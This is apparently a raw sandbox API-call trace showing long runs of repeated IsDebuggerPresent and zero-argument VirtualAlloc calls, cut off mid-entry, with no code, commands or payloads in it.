IsDebuggerPresent () returned 0 [0054.596] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.596] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.597] IsDebuggerPresent () returned 0 [0054.597] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.598] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] IsDebuggerPresent () returned 0 [0054.599] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.599] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.599] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.599] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.600] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.601] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.602] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.603] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.604] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.605] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.606] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.607] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.608] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.608] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.614] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.615] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.616] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.617] VirtualAlloc 